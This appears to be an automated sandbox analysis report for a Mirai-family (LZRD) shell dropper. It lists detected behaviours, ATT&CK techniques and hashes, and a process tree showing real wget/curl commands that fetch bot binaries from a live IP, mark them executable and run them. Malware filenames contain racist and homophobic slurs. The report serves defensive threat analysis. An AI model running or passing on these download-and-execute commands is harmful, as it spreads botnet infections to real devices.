mirai | 9724ec0ed2f79f63d1e62dbf2da4a1ffe5b81d8446230f33795427bba5a57e3a

Analysis

max time kernel
13s
max time network
149s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
18-01-2025 04:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh
Size

4KB
MD5

c458138484ec7b830d632fd383d3d321
SHA1

0e7c076b71401207c7568f50f897110ea98f9d73
SHA256

9724ec0ed2f79f63d1e62dbf2da4a1ffe5b81d8446230f33795427bba5a57e3a
SHA512

e0a9fb2dcae645581a9f57372d93c30b6b4c906fc888582e91c4ef0de4b6dce961bcca0440f56164ad5354de41e91aab0fcb38dbee4fd0b7db2249fe75cd01fd
SSDEEP

48:vXkTv3X9CTXiFLXF6vX/4vXL02th3Xri5lXodNL3X7E2aLX877JX9CTXJ+LX2ZTS:v6aiqGtDis3kL2K+WriR

Score

10^/10

mirai lzrd antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 12 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
673	chmod
681	chmod
733	chmod
783	chmod
802	chmod
812	chmod
820	chmod
713	chmod
744	chmod
760	chmod
794	chmod
807	chmod

Executes dropped EXE 12 IoCs

ioc	pid	Process
/tmp/HAHAWTFNIGGA	675	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	682	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	715	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	735	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	745	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	762	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	785	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	795	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	803	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	808	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	813	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	821	HAHAWTFNIGGA

Modifies Watchdog functionality 1 TTPs 4 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	HAHAWTFNIGGA
File opened for modification	/dev/misc/watchdog	HAHAWTFNIGGA
File opened for modification	/dev/watchdog	HAHAWTFNIGGA
File opened for modification	/dev/misc/watchdog	HAHAWTFNIGGA

Writes file to system bin folder 4 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	HAHAWTFNIGGA
File opened for modification	/bin/watchdog	HAHAWTFNIGGA
File opened for modification	/sbin/watchdog	HAHAWTFNIGGA
File opened for modification	/bin/watchdog	HAHAWTFNIGGA

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-1.dat	upx
behavioral2/files/fstream-4.dat	upx
behavioral2/files/fstream-12.dat	upx
behavioral2/files/fstream-15.dat	upx
behavioral2/files/fstream-17.dat	upx
behavioral2/files/fstream-18.dat	upx
behavioral2/files/fstream-20.dat	upx
behavioral2/files/fstream-22.dat	upx
behavioral2/files/fstream-24.dat	upx
behavioral2/files/fstream-26.dat	upx
behavioral2/files/fstream-28.dat	upx

Checks CPU configuration 1 TTPs 12 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 27 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/exe	HAHAWTFNIGGA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/exe	HAHAWTFNIGGA
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/exe	HAHAWTFNIGGA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
680	cat
682	HAHAWTFNIGGA
677	wget
679	curl

Writes file to tmp directory 24 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm7	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arc	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_i686	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_i686	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mpsl	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arc	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_i468	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm5	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm7	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm6	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_ppc	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_ppc	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86	curl
File opened for modification	/tmp/HAHAWTFNIGGA	GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mips	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mips	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86_64	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86_64	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mpsl	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm5	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm6	wget

/tmp/GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh
/tmp/GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh
1⤵
- Writes file to tmp directory
PID:645
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - Writes file to tmp directory
  PID:647
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:663
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  PID:672
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-xUMJMk YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - File and Directory Permissions Modification
  PID:673
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.x86
  2⤵
  - Executes dropped EXE
  PID:675
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:677
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:679
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_mips
  2⤵
  - System Network Configuration Discovery
  PID:680
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-xUMJMk YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - File and Directory Permissions Modification
  PID:681
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:682
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arc
  2⤵
  - Writes file to tmp directory
  PID:685
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:698
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_arc
  2⤵
  PID:712
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-xUMJMk YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - File and Directory Permissions Modification
  PID:713
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.arc
  2⤵
  - Executes dropped EXE
  PID:715
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_i468
  2⤵
  PID:717
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_i468
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:724
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_i468
  2⤵
  PID:732
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-xUMJMk YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - File and Directory Permissions Modification
  PID:733
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.i486
  2⤵
  - Executes dropped EXE
  PID:735
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_i686
  2⤵
  - Writes file to tmp directory
  PID:736
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_i686
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:742
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_i686
  2⤵
  PID:743
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-xUMJMk YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.i686
  2⤵
  - Executes dropped EXE
  PID:745
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - Writes file to tmp directory
  PID:747
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:750
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  PID:759
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-xUMJMk YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:760
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.x86
  2⤵
  - Executes dropped EXE
  PID:762
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_mpsl
  2⤵
  - Writes file to tmp directory
  PID:765
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:773
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_mpsl
  2⤵
  PID:781
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-xUMJMk YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:783
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.mpsl
  2⤵
  - Executes dropped EXE
  PID:785
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm
  2⤵
  - Writes file to tmp directory
  PID:787
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:792
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_arm
  2⤵
  PID:793
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-xUMJMk YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_arm YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:794
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.arm
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:795
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm5
  2⤵
  - Writes file to tmp directory
  PID:799
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:800
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_arm5
  2⤵
  PID:801
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-xUMJMk YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_arm YOUCANTGETTHESEBINSFAGGOT12322257_arm5 YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:802
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.arm5
  2⤵
  - Executes dropped EXE
  PID:803
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm6
  2⤵
  - Writes file to tmp directory
  PID:804
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:805
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_arm6
  2⤵
  PID:806
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-xUMJMk YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_arm YOUCANTGETTHESEBINSFAGGOT12322257_arm5 YOUCANTGETTHESEBINSFAGGOT12322257_arm6 YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:807
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.arm6
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  PID:808
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm7
  2⤵
  - Writes file to tmp directory
  PID:809
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:810
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_arm7
  2⤵
  PID:811
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-xUMJMk YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_arm YOUCANTGETTHESEBINSFAGGOT12322257_arm5 YOUCANTGETTHESEBINSFAGGOT12322257_arm6 YOUCANTGETTHESEBINSFAGGOT12322257_arm7 YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:812
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.arm7
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:813
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_ppc
  2⤵
  - Writes file to tmp directory
  PID:817
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_ppc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:818
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_ppc
  2⤵
  PID:819
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-ecf16db582104ccfb48996ce0e08ea22-systemd-timedated.service-xUMJMk YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_arm YOUCANTGETTHESEBINSFAGGOT12322257_arm5 YOUCANTGETTHESEBINSFAGGOT12322257_arm6 YOUCANTGETTHESEBINSFAGGOT12322257_arm7 YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_ppc YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:820
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.ppc
  2⤵
  - Executes dropped EXE
  PID:821
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_spc
  2⤵
  PID:823

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/HAHAWTFNIGGA

Filesize
54KB

MD5
6bff55a17b86704d96b56975ff2927b5

SHA1
a2dbde39a7efc8259274e17b6670ef263f55d20e

SHA256
4b7f737fb060a45d7d03ffd221d70e8673f5e2e79d825ea76aecaf3282724032

SHA512
c03fa3f759631875e2c264c2d86a549940336acc028713e73d193322393cf4c1180e530b28aa2e005c4008b45a0c386b8c19df7add4e32c2d9f00cc78456fb20

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arc

Filesize
121KB

MD5
b2137fad57343a2c54f4167b42c52b4f

SHA1
3e2dfcd9b129e9502ef854f7451f7299812036ba

SHA256
cdd7d9565af3469b9a821239429b637797480fdc5e7f42095b948da44fe47921

SHA512
e9e5db39f798746dd16435db13548964d6e71f3002fb6123e7f0f3436c8f340a394701acf87b00bcce9c5176e89c0d46bf33ca51184d78ad7928a77cdff91d3c

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm

Filesize
29KB

MD5
ca3ed843f4289de112cfc3a9de2ce220

SHA1
fd52c7ca778a49fa52fd40eae34bbd6129609c44

SHA256
23c0d23f740c158abb9219f03832792056aa592faa7b7ab363dec0b8d00bd690

SHA512
1ac6db8d700bf61304541d8cb03e1a38475d70baa87c8b7287740359e67d17b0c1178050c6a907d52efa23edc49355dcb94e5817343a0ab8af2b616d67601d2c

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm5

Filesize
26KB

MD5
0c5f7f358e2283013858bcf22f812c41

SHA1
e98c0819df578b50d73189529ef995664db3ef85

SHA256
7377eedc36395600fb8c490c9f227e6471da8672ee042a92127119ed948bc6b4

SHA512
3185b997a393ec180d76f9d896c6a8d68143b3edd85b5794dcadb9aa0046fe23ecbc44c82e2545fab5b28c77b8651383c42c8b8f03a6b4f31ab7f68515957729

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm6

Filesize
34KB

MD5
b4421c007b6ee01b53296d6eb2c1d43e

SHA1
20c3f4d919a40e6bd50db26e9262a14ff6c116bf

SHA256
ee3793b2f7e994ae3c54f6932321c37c100b8253aedc64521b9b61e711f3a927

SHA512
fa401663d9d7fd9f0648ca6dd00567325616ecad9f261b8964d0923b5fba0d87613ef6a2f3be867de47ba6d6a36ac08d4ab6b814be68a78a44b4f3e0e8f98ea3

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm7

Filesize
54KB

MD5
2ed2993bc6391b0f0637a13e36eaf54a

SHA1
0c8288bc63885aa31a99ca03cebf26db686928d4

SHA256
025adeffba90479e24082201ad61376ce1d6473267a94a6901fea405ae557196

SHA512
0b320bd4dd81e8a1a9669bf6be1f34ec66794126a8ea34ab15904fe848a77549b60bc44650cdbd1e986108757c2ed8a31cc588207be392e78211fae44a2763a1

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_i468

Filesize
250B

MD5
b32e06510115090646e59678f1583ff8

SHA1
34a0f3de9eae2379c20ca6c0681d513e100a0fb9

SHA256
c8e94d7c390d5b8077a811d03aa72e21ca8f3cb740e111349dc75fb056984258

SHA512
1841bb5a14b6390a4c4b8e5db61be9eb62766877d39161f4a385c957508ebce83355b9d3e3fef300b17cb216d7f00da06b06beeb9bc273adb58996db9b5fe432

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_i686

Filesize
31KB

MD5
fbc0418c5814b38ea0700dd88bcaa9a3

SHA1
9890e3e3e8428a490404f3c037b3a4440cd98c0d

SHA256
6180a72b71fd89c5aa94c451434ae2bce4ab8e47b746105345542ffb4ceec762

SHA512
5f9c6048e39e9f7cc9c91e52097e0762e991d40952a467783e7ad17d4704a6f92de9d89334c30a3471b2c3e4f502a331c0ffb55435fa95afb12c5eb27b5eb63a

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mips

Filesize
31KB

MD5
21165b8b4e986efc031cd41016dde6b6

SHA1
39ce8fe9071745d8f2f5493b243376dbd5418a36

SHA256
a61b712082a6c62842aa60f98806b2daf292a54119ae5f4d422fee3239fc5c86

SHA512
96a0d5ee860f38716f07780d9b47949851f6cc8284d17278d0a432b36a1dfd879966c160abb43ef294bfd6047504f84019ae51639f8ede3e00ab76502671c0ed

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mpsl

Filesize
32KB

MD5
4e23210e2603fe08846bf7eeebd8aab5

SHA1
b6f6949d7c9da505946a90bbb8cca46a4c3efd53

SHA256
cd510f2661e5d81afed3093967ef5c31f1a14967a0e88b2b005549695653eaaa

SHA512
9f3d48b2744fa1d3b489fcec2d1dd2b1ecf74f3ae47d38cc0b424a10b20f69ce1c61809426f0f58068dcf902fcaeb815dee465b9b2c8512973d3e4cbbfe4a2d8

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_ppc

Filesize
28KB

MD5
1b794331eb6236353c7d51858ecd53dd

SHA1
71106443d803b7fe26a4f6e8736633640161f752

SHA256
145703e2f00273f3e3662a4c898e3598d673fb55e143123108bf34e75c859cd8

SHA512
55aa44900c9d87f209dbec55a84a08e2a8cbaa07a0a2a98a51436efdd005a1b53b0d0d449ae07af90021defdeeb8367b75fea4a87eb3037a149a262eb698b1f9

Download Submit
